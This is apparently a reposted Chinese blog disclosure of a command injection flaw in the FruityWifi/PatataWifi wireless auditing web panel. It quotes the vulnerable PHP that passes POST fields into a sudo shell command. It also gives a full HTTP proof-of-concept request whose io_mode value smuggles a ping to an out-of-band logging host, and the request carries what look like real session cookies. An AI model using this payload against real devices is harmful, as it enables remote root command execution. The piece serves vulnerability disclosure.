标签:代码 cdh user nmp ble wss wireless 移动 请求
FruityWIfi是一款有名的无线安全审计的开源工具,其灵感来自于wifipineapple,目前该工具已经更新到2.4。它能够让用户通过web界面来控制和管理模块,十分方便。FriutyWifi最初的设想是能够在树莓派上使用,但是也可以安装在Debian系列的操作系统上,例如Debian,kali Linux等,甚至可以安装在NetHunter上,在某些移动设备上使用。 详细介绍和使用看这里http://www.freebuf.com/articles/wireless/157559.htmlgithub:https://github.com/PatatasFritas/PatataWifi
issues:https://github.com/PatatasFritas/PatataWifi/issues/1
script/config_iface.php 文件
<?
include_once dirname(__FILE__)."/../config/config.php";
require_once WWWPATH."/includes/login_check.php";
require_once WWWPATH."/includes/filter_getpost.php";
include_once WWWPATH."/includes/functions.php";
// ------------ IN | OUT (START) -------------
if(isset($_POST[‘io_mode‘])){
$exec = "/bin/sed -i ‘s/io_mode=.*/io_mode=\\\"".$_POST[‘io_mode‘]."\\\";/g‘ ../config/config.php";
exec_fruitywifi($exec);
}看这里执行的代码是通过 exec_fruitywifi 函数执行的,这个函数在 functions.php里面,如下代码:
function exec_fruitywifi($exec) {
$bin_exec = "/usr/bin/sudo";
exec("$bin_exec sh -c \"$exec\"", $output);
//exec("$bin_exec sh -c \"$exec\" 2>&1", $output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio)
//LOG
$rs = fopen(LOGPATH."/exec.log", ‘a‘);
fwrite($rs, date("Y-m-d H:i:s")." - "."$bin_exec sh -c \"$exec\"\n");
if(is_array($output) and array_key_exists(0, $output)) {
fwrite($rs, "\t".$output[0]."\n\n");
} elseif (is_string($output)) {
fwrite($rs, "\t".$output."\n\n");
}
fclose($rs);
return $output;
}
可以看到使用exec直接拼接执行了代码。
poc如下:
POST /script/config_iface.php HTTP/1.1
Host: 192.168.8.150
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1305686839.1530540055; _octo=GH1.1.1160558809.1530540055; tz=Asia%2FShanghai; user_session=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; __Host-user_session_same_site=G3Lilv5ed8uCKk3xwZs5K_qD6izdAtXukNtPndcLr0ShNo8j; logged_in=yes; dotcom_user=ly55521; has_recent_activity=1; _gh_sess=MWl5N0NXckk5ekF0TTEzQXEwYUZaMVdaOGFDdWVjbitiMTFqNzJXK0piNmpLTlg4OTJRMHVhQUJrVHRVenNlQ09aUnBIaFJyN2JoNmFBZXdJK1ZVMzRqQXRBTjlRZzdSVFcydUIrTWtrMHhnaWUzRjJlQk9yVGpTSkdkcVJncDh3a0tRR0pWVWlMNkw5Q2QxLzY2T3JDbEo2b1FjTm90WHB0MS94bHNJYmNZTHhaYmllNzMySEVDZWxtTUxYNCtKQzlqRjRVWlJvOUJ5cFFKL3RLRGRpak1rdGZva2M5SnVDekt6N1JpSmVpdHVGMy9aMTFJbkk1eDlnUXAvNm5CTTVjS1dqSmlUbHFhTXc4WExyWnZuQTFXcnBpMHA1OEp3VnBGdWlMSWtTWVk9LS1VTDViV1pMeFNMaGxMUE5lWDg5M1FRPT0%3D--ec33e4803fc050592008c1eebd9fb22483774002
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
io_mode=123%26‘%600%26ping%203.t00ls.fc7853eedebcc14a39700d54c9b8acca.tu4.org.%26%60‘可以收到ping请求。
再看 page_config.php 文件的 82/84行,同样存在命令执行漏洞。
$hostapd_ssid=$_POST[‘newSSID‘];
exec_fruitywifi("sed -i ‘s/hostapd_ssid=.*/hostapd_ssid=\\\"".$_POST[‘newSSID‘]."\\\";/g‘ ./config/config.php");标签:代码 cdh user nmp ble wss wireless 移动 请求
原文地址:http://blog.51cto.com/010bjsoft/2175710
